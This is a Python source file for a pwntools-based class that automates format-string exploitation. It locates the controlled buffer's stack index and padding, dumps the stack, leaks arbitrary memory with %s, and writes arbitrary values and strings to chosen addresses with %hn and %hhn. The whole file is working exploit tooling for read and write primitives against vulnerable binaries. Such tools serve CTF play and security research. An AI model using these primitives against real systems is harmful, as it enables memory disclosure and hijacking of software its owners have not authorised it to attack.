from pwn import *

class FormatString:
    """Initialize a FormatString class
    
    Parameters
    ----------
    exec_fmt : function
        Function that takes in one input, a string, and returns the output of the format string vulnerability on it.
    arch : str, optional
        String representing what architecture this binary is.
    bits : int, optional
        How many bits is this binary? Commonly 32 (Default) or 64.
    endian : str, optional
        Is this binary little or big endian?
    elf : pwnlib.elf.elf.ELF, optional
        pwnlib elf instantiation of this binary. If specified, all fields will be taken from this class.
    max_explore : int, optional
        How deep down the stack should we explore? Larger numbers may take more time. Default is 64.
    bad_chars : str, optional
        What characters should we avoid when exploiting this? Defaults to newline character.
    index : int, optional
        If you already know the index for this vulnerability, you can specify it here
    pad : int, optional
        If you already know the padding needed, you can specify it here
    written : int, optional
        If you already know how many bytes have been written in the format string, you can specify it here
    explore_stack : bool, optional
        Should we auto-explore the stack? Defaults to True.
    
    
    Returns 
    -------
    fmtStr : FormatString.FormatString

    
    Attributes
    ----------
    arch : str
        String representation of the architecture, such as i386 and amd64
    bits : int
        Integer representation of how many bits are in this architecture
    endian : str
        String representation of what endianness this binary is: little or big
    elf : pwnlib.elf.elf.ELF
        pwnlib ELF instantiation representing this binary
    exec_fmt : function
        Function to be called when we need to evaluate a format string
    max_explore : int
        How deep down the stack should we explore?
    bad_chars : str
        What characters should we avoid when exploiting this?

    """
    
    def __init__(self,exec_fmt,arch='i386',bits=32,endian='little',elf=None,max_explore=64,bad_chars="\n",
                 index=None,pad=None,written=None,explore_stack=True):

        if type(exec_fmt) is not type(lambda x: x):
            log.error("exec_fmt arg must be a callable function.")
            return

        self.arch = arch
        self.bits = bits
        self.endian = endian
        self.elf = elf
        self.exec_fmt = exec_fmt
        self.max_explore = max_explore
        self.bad_chars = bad_chars

        # Might want to change this sometime...
        self.padChar = "C"
        
        # Where is our controlled buffer?
        self.pad = pad
        self.index = index
        self.already_written = written

        # Recording what's already on the stack
        self.stack = [0]
        
        # The ELF will override the other options
        if elf is not None:
            if type(elf) is not pwnlib.elf.elf.ELF:
                log.warn("ELF argument is wrong type. Expecting pwnlib.elf, got {0}. Ignoring for now.".format(type(elf)))

            else:
                self.arch = elf.arch
                self.bits = elf.bits
                self.endian = elf.endian

        self.leak = memleak.MemLeak(self._leak)
        
        # Skip the index find if we have been given it
        if self.index != None:
            # If no pad specified, default to 0
            if self.pad == None:
                log.warn("Index specified but no pad specified. Defaulting to 0.")
                self.pad = 0
        
        else:
            # Try to determine where we are in the binary
            self._findIndex()

        if explore_stack:
            self._exploreStack()

    def _intToStr(self,i):
        """Converts integer to it's corresponding ASCII string representation"""
        
        # Change to hex
        s = hex(i)[2:]

        # Add padding if needed
        if len(s) % 2 == 1:
            s = "0" + s

        # Unhexlify it
        s = unhexlify(s)

        # Reverse the order if we're little endian
        if self.endian == 'little':
            s = s[::-1]

        return s


    def _isPrintableString(self,s):
        """Check if the string we're given should be considered printable."""
        return min(map(lambda x: x in string.printable,s))


    def printStack(self,guessPointers=True):
        """Print out what we know about the stack layout in a table format. Note: guessPointers may cause the binary to crash if it is guessed incorrectly."""
        
        columns = ["Index","Value","Guess"]

        table = PrettyTable(columns)
        table.align['Guess'] = 'l'

        # Create some statistics for heuristics and pointer guessing
        stats = {key:len(list(group)) for key,group in groupby(sorted([hex(addr)[2:5] for addr in self.stack if addr > 0x1000 and not self._isPrintableString(self._intToStr(addr))]))}

        # Loop through the stack items creating table
        for i in range(1,len(self.stack)):
            val = self.stack[i]
            guess = []

            # If the data in here is printable
            if self._isPrintableString(self._intToStr(val)):
                guess.append(repr(self._intToStr(val)))

            # If we have elf tools and this appears to be a known address
            if self.elf and val in self.elf.symbols.values():
                guess.append("Symbol: " + [sym for sym in self.elf.symbols if self.elf.symbols[sym] == val][0])

            # If we think this might be a pointer
            if guessPointers and hex(val)[2:5] in stats and stats[hex(val)[2:5]] > 2:
                
                guess.append("Pointer --> " + repr(self.leak.s(val))[:64])

            # Add it to our table
            table.add_row([
                i,
                hex(val),
                ', '.join(guess)
            ])

        print(table)


    """
    def printStack(self):
        ""Print out what we know of the stack layout in a table format.""
        columns = ["Index","Value","Guess"]
        table = PrettyTable(columns)
        
        # Loop through stack items creating table
        for i in range(1,len(self.stack)):
            guess = ""

            # See if it's printable
            asString = hex(self.stack[i])[2:]
            if len(asString) % 2 != 0:
                asString = "0" + asString
            asString = unhexlify(asString)

            if min(asString, lambda x: x in string.printable) == True:
                guess = asString
            
            # If we have elf tools and this appears to be a known address
            if self.elf:
                symbols = [sym for sym in self.elf.symbols if self.elf.symbols[sym] == self.stack[i]]
                if len(symbols) > 0:
                    guess = "Symbol: " + symbols[0]

                # If this is part of our binary, let's try dereferencing it
                #if self.elf.vaddr_to_offset(self.elf.symbols[sym])
            
            table.add_row([
                i,
                hex(self.stack[i]),
                guess
            ])

        print(table)
    """     

    def _exploreStack(self):
        """Explore what pointers and data already exists on the stack."""

        wordSize = self.bits / 8
        
        # Assuming 0 pad if we haven't found one yet...
        # TODO: Could create a heuristic find to get a better idea of the correct pad.
        pad = self.pad or 0

        # Loop through and record the values
        for i in range(1,self.max_explore):
            s = "{2}{0}%{1}$p{0}".format("J"*wordSize,i,"C"*pad)
            out = self.exec_fmt(s)
            out = out[out.index("J"*wordSize)+wordSize:]
            out = out[:out.index("J"*wordSize)]
            if out == "" or "(nil)" in out:
                self.stack.append(0)
            else:
                self.stack.append(int(out,16))

        

    def _findIndex(self):
        """Figure out where our input starts as well as other information automatically.
        
        The findIndex step automates the process of determining where our
        controlled input starts. It will iteratively shift inputs to the format
        string function until it finds the proper index and padding. It will
        then save that value in the class instance for future reference.
        """
        print("Exploring format string vulnerability...")

        discovered = False
        
        # How big should our search words be?
        wordSize = self.bits / 8

        # Change our output type based on the size we're looking for
        if self.bits == 32:
            outType = "x"
        elif self.bits == 64:
            outType = "lx"
        else:
            log.error("Unknown bits variety {0}".format(self.bits))
            return None
        
        # TODO: Might wanna change this later to something less predictable.
        testInput = "A"*wordSize
        padChar = self.padChar

        # Loop through up to the max exploration depth
        for index in range(1,self.max_explore):

            # Check for pad offset
            for pad in range(wordSize):

                output = self.exec_fmt("{2}{0}%{3}$0{1}{4}".format(testInput,wordSize*2,padChar * pad,index,outType))
                outputHex = output.split(testInput)[1][:wordSize*2] # grab the hex

                # If this is the base print, lets find the number of bytes written before us
                if index == 1 and pad == 0:
                    self.already_written = len(output.split(testInput)[0])

                # Check if we found it
                if unhexlify(outputHex)[::-1] == testInput:
                    discovered = True
                    break
            
            # Don't continue if we've found it
            if discovered:
                break

        if discovered:
            print("Found the offset to our input! Index = {0}, Pad = {1}".format(index,pad))
            self.index = index
            self.pad = pad

        else:
            log.warn("Failed to find offset to our input! You will have reduced functionality.")

    def _leak(self,addr):
        """Given an addr, leak that memory as raw string.

        .. note::

            This is a base function. You probably don't want to call this directly. Instead, you should call methods of the ``leak`` method, such as ``leak.d(addr)``

        Parameters
        ----------
        addr : int
            Address to leak some bytes from

        Returns
        -------
        str
            Raw leak of bytes as a string starting from the given address.


        """
        wordSize = self.bits / 8

        # TODO: Randomize guard?
        guard = "J"*wordSize

        # If we control an index, let's use it
        if self.index:

            # Hand doing this for now due to not necessarily using pwntools...
            if self.bits == 32:
                if self.endian == 'little':
                    addr = pack("<I",addr)
                else:
                    addr = pack(">I",addr)
            elif self.bits == 64:
                if self.endian == 'little':
                    addr = pack("<Q",addr)
                else:
                    addr = pack(">Q",addr)
            else:
                log.error("Unable to leak address due to unknown bits size of {0}".format(self.bits))
                return None

            # Check for chars we don't like
            if self._hasBadChar(addr):
                return None
        
            # TODO: To simplify things, I give us generically 3 characters (upto index 999) to work with. This might not be desired in some cases. Maybe re-write this later to be more efficient

            # Real index takes into account that our own input is moving this around
            sLineSize = int(wordSize * round(float(6)/wordSize)) / wordSize
            realIndex = self.index + 2 + sLineSize
            sLine = "%{0}$s".format(str(realIndex).rjust(3,"0"))
            sLine = sLine + "J" * (wordSize - (len(sLine) % wordSize)) if (len(sLine) % wordSize) != 0 else sLine # Pad it out to a word length
        

            # Put it together
            fmt = "{0}{1}{2}{4}{3}".format(self.padChar*self.pad,guard,sLine,addr,guard)

        # See if we have this address in the stack
        elif addr in self.stack:
            pad = self.pad or 0
            # Don't really have to worry about padding here
            sLine = "%{0}$s".format(self.stack.index(addr))
            fmt = "{0}{1}{2}{1}".format(self.padChar*pad,guard,sLine)

        # We failed.
        else:
            return None

        out = self.exec_fmt(fmt)

        # If the leaker failed to return anything, we won't be able to do any more
        if out == None:
            return None
        
        # Split out the output
        out = out[out.index(guard) + len(guard):]
        out = out[:out.index(guard)]

        # Since we're printing strings, let's assume it's a null
        if out == "":
            out = "\x00"

        return out

    def _hasBadChar(self,s):
        """Check input for bad characters.

        Given the bad_chars we initialized the class with, check the input variable to see if any exist in there.

        Parameters
        ----------
        s : int or str
            Input to be checked for bad characters.

        
        Returns
        -------
        bool
            True if input has bad characters, False otherwise


        Note that if the input is an integer, it will be converted to hex then to a string to be checked for bad characters.
        """

        # Just convert it
        if type(s) is int:
            h = hex(s)[2:]
            # Pad length
            if len(h) % 2 != 0:
                h = "0" + h

            s = unhexlify(h)

        # Check for chars we don't like
        for badChar in self.bad_chars:
            if badChar in s:
                return True

        return False

    def _packPointer(self,val):
        """Packs val as pointer relevant to the current binary.

        Parameters
        ----------
        val : int
            Pointer value as integer that should be packed appropriately to this binary.

        
        Returns
        -------
        str
            Integer packed as string relevant to this binary (i.e.: proper endianness)

        """
        assert type(self.bits) is int
        assert type(self.endian) is str

        if self.bits == 32:
            bits_str = "I"
        elif self.bits == 64:
            bits_str = "Q"
        else:
            log.error("Unknown bits value of {}".format(self.bits))
            return None

        if self.endian == 'little':
            endian_str = "<"
        elif self.endian == "big":
            endian_str = ">"
        else:
            log.error("Unknown endian type {}".format(self.endian))
            return None

        return pack("{0}{1}".format(endian_str,bits_str),val)


    def write_byte(self,addr,val):
        """write a single byte of data at addr

        Parameters
        ----------
        addr : int
            Address to write the byte to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """

        # TODO: Update this to utilize exisiting stack pointers like how i did it to writing dwords
        
        assert type(val) in [int,str]
        assert type(addr) is int

        # Check for chars we don't like
        if self._hasBadChar(addr):
            return None
        
        # For later packing/unpacking
        endian_dir = "<" if self.endian is 'little' else ">"
        
        # For proper alignment
        pointer_len = self.bits/8
        
        # Change string to int
        if type(val) is str:
            if len(val) != 1:
                log.error("Write byte expects string of length 1, got length {0}".format(len(val)))
                return None

            # Change it to int
            val = unpack("{0}B".format(endian_dir),val)[0]

        elif val > 0xff:
            log.error("Attempting to write more than one byte. Use different write call.")
            return None

        # Print out appropriate number of chars
        fmt = ""
        if val - self.pad - self.already_written > 0:
            fmt += "%{0}c".format(str(val-self.pad-self.already_written))
        
        elif val - self.pad - self.already_written < 0:
            log.error("Pad value is larger than print value. Pick a larger value to write.")
            return None

        fmt += "%{0}$hhn"

        # TODO: Add check here that we can actually print this FEW. If pad > val we won't get this to work.

        # Round up to pointer length
        pad_after = ((int(math.ceil(len(fmt) / float(pointer_len))) * pointer_len) - len(fmt)) % pointer_len
        
        size = len(fmt) + pad_after
        
        assert size % pointer_len == 0
        
        # Adjust index
        index_updated = self.index + (size / pointer_len)

        fmt = fmt.format(str(index_updated).rjust(3,"0"))

        fmt = "{3}{0}{1}{2}".format(
            fmt,
            "J"*pad_after,
            self._packPointer(addr),
            "J"*self.pad
            )

        self.exec_fmt(fmt)


    def write_word(self,addr,val):
        """write a word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """

        assert type(val) in [int,str]
        assert type(addr) is int
        
        endian_dir = "<" if self.endian is "little" else ">"

        if type(val) is str:
            if len(val) != 2:
                log.error("Write word expects string of length 2, got length {0}".format(len(val)))
                return None
            
            val = unpack("{0}H".format(endian_dir),val)[0]

        elif val > 0xffff:
            log.error("Input value is larger than word size (0xffff)")
            return None

        return self.write_n_words(addr,val,1)

        
    def write_n_words(self,addr,val,n):
        """Write value at addr, telling FormatString how many words you actually want to write

        Parameters
        ----------
        addr : int
            Address to write words to
        val : int
            Value to write at address
        n : int
            Number of words that this value represents


        This will attempt to write `n` words of `val` starting at address
        `addr`. Note that it will write in words and, for now, will not utilize
        byte writes. This is the core method that the other calls (aside from
        write_byte) use to actually write.

        """

        assert type(val) in [int,long]
        assert type(addr) in [int,long]
        assert type(n) is int

        # Check for chars we don't like
        if self._hasBadChar(addr):
            return None

        endian_dir = "<" if self.endian is "little" else ">"

        pointer_len = self.bits/8

        # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
        pad = self.pad or 0
        already_written = self.already_written or 0

        # TODO: This is kinda #YOLO... Need to better handle the case where we're going into the blind from the get go..
        index = self.index or 1

        # Split up the val into multiple word writes
        writes = []

        # Parse out all the different writes
        for i in range(n):
        
            # Append first write
            writes.append({
                'val': val & 0xffff,
                'addr': addr
                })

            # Shift off part we just added
            val >>= 16
            addr += 2
        

        # Sort writes by value increasing
        writes = sorted(writes,key=lambda x: x['val'])

        fmt = ""

        # For each value we need to write, add it on to the format string
        cumulative = already_written + pad

        for write in writes:

            if write['val'] - cumulative > 0:
                fmt += "%{0}c".format(write['val'] - cumulative)

            if write['val'] - cumulative < 0:
                log.error("Ran into an impossible write apparently... :-/")
                return None

            fmt += "%{" + str(writes.index(write)) + "}$hn"
            cumulative = write['val']

        # Round up to pointer length
        pad_after = ((int(math.ceil(len(fmt) / float(pointer_len))) * pointer_len) - len(fmt)) % pointer_len

        size = len(fmt) + pad_after
        assert size % pointer_len == 0

        fmt += "J"*pad_after

        # Update our addr index
        index_updated = index + (size / pointer_len)

        # Going to dynamically build the pythong format args
        fmt_format = []

        # Tack on the addresses now
        for write in writes:
            # If we can reference it already on the stack, use that to save space.
            if write['addr'] in self.stack:
                fmt_format.append(str(self.stack.index(write['addr'])).rjust(3,"0"))

            # Looks like we need to use our own buffer for the pointer
            else:
                fmt += self._packPointer(write['addr'])
                fmt_format.append(str(index_updated).rjust(3,"0"))
                index_updated += 1

        # Add in padding
        fmt = "J"*pad + fmt

        # Now add in our indexes
        fmt = fmt.format(*fmt_format)

        self.exec_fmt(fmt)
        

    def write_dword(self,addr,val):
        """write a double word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the double word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """

        assert type(val) in [int,str]
        assert type(addr) is int
        
        endian_dir = "<" if self.endian is "little" else ">"

        if type(val) is str:
            if len(val) != 4:
                log.error("Write dword expects string of length 4, got length {0}".format(len(val)))
                return None

            val = unpack("{0}I".format(endian_dir),val)[0]

        elif val > 0xffffffff:
            log.error("Input value is larger than dword size (0xffffffff)")
            return None

        return self.write_n_words(addr,val,2)
    
    def write_qword(self,addr,val):
        """write a quad word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the quad word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """

        assert type(val) in [int,str,long]
        assert type(addr) is int
        
        endian_dir = "<" if self.endian is "little" else ">"

        if type(val) is str:
            if len(val) != 8:
                log.error("Write qword expects string of length 8, got length {0}".format(len(val)))
                return None

            val = unpack("{0}Q".format(endian_dir),val)[0]

        elif val > 0xffffffffffffffff:
            log.error("Input value is larger than dword size (0xffffffffffffffff)")
            return None

        return self.write_n_words(addr,val,4)

    def write_string(self,addr,s):
        """Attempt to write s as a string at address addr

        Parameters
        ----------
        addr : int
            Address to start writing the string to
        s : str
            String to write to address



        This call will attempt to write the string provided into the address
        provided. It does this by turning the string into a large number and
        writing the large number.

        """
        
        assert type(addr) in [int, long]
        assert type(s) is str

        # Adjust for endianess
        if self.endian == 'little':
            s = s[::-1]

        words = int(len(s)/2)
        if len(s) % 2 != 0:
            words += 1

        # Need to convert it to an integer?
        self.write_n_words(addr,int(s.encode('hex'),16),words)

    def write_b(self,addr,val):
        """Wraps the ``write_byte`` call"""
        return self.write_byte(addr,val)
        
    def write_w(self,addr,val):
        """Wraps the ``write_word`` call"""
        return self.write_word(addr,val)

    def write_d(self,addr,val):
        """Wraps the ``write_dword`` call"""
        return self.write_dword(addr,val)

    def write_q(self,addr,val):
        """Wraps the ``write_qword`` call"""
        return self.write_qword(addr,val)

    def write_s(self,addr,s):
        """WRaps the ``write_string`` call"""
        return self.write_string(addr,s)

    def __getitem__(self,addr):
        """
        Get item is shorthand for leaking that memory location of the binary.
        """
        return self.leak(addr)
        

import logging
log = logging.getLogger('FormatString')
from binascii import unhexlify
from struct import pack, unpack
from prettytable import PrettyTable
import string
from itertools import groupby
